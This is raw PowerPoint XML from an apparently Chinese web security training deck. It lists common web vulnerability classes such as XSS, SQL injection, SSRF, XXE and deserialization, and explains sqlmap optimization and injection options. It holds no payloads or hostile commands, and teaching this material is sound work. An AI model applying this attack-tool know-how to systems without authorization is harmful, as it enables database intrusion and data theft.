            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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safe-freq=SAFREQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>两次访问之间测试请求，给出安全的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155697826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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715770" y="2272975"/>
            <a:ext cx="3045460" cy="3347840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>命令执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>六</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、常见</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F136DE9A-AEE8-9449-86DA-7FC01A42586D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="2254990"/>
            <a:ext cx="3977640" cy="2796407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>写入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>反序列化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>未授权访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>目录遍历</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>业务逻辑漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334397544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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4240584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Optimization(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>优化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可用于优化 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SqlMap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的性能。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开启所有优化开关</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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predict-output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>预测常见的查询输出</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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keep-alive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>使用持久的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP(S)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>连接</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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null-connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从没有实际的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>响应体中检索页面长度 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>threads=THREADS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最大的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP(S)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求并发量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>默认为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66905480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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4740721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Injection(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以用来指定测试哪些参数， 提供自定义的注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>和可选篡改脚 本。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TESTPARAMETER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可测试的参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>S)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--dbms=DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>强制后端的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
